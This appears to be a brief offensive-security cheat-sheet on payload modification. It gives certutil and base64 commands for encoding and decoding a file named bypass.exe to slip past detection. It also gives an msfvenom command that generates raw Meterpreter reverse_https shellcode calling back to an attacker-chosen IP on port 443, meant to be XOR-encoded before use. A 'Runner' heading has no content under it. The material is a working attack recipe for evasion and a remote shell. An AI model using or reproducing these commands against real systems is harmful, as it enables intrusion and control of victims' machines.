Payload Mod
Base64 Encoding
Windows and Linux has different base64 encoding mechanism:
Windows
Encode
certutil -encode z:\tools\bypass.exe bypass.txt
Decode
certutil -decode bypass.txt bypass.exe
Linux
Encode
base64 binary > binary.txt
Decode
base64 -d binary.txt > binary
XOR Encoding
Encode shellcode
generate with raw shellcode
msfvenom -p windows/meterpreter/reverse_https LHOST=(IP Address) LPORT=443 -f raw > shellcode.bin
Runner
Last updated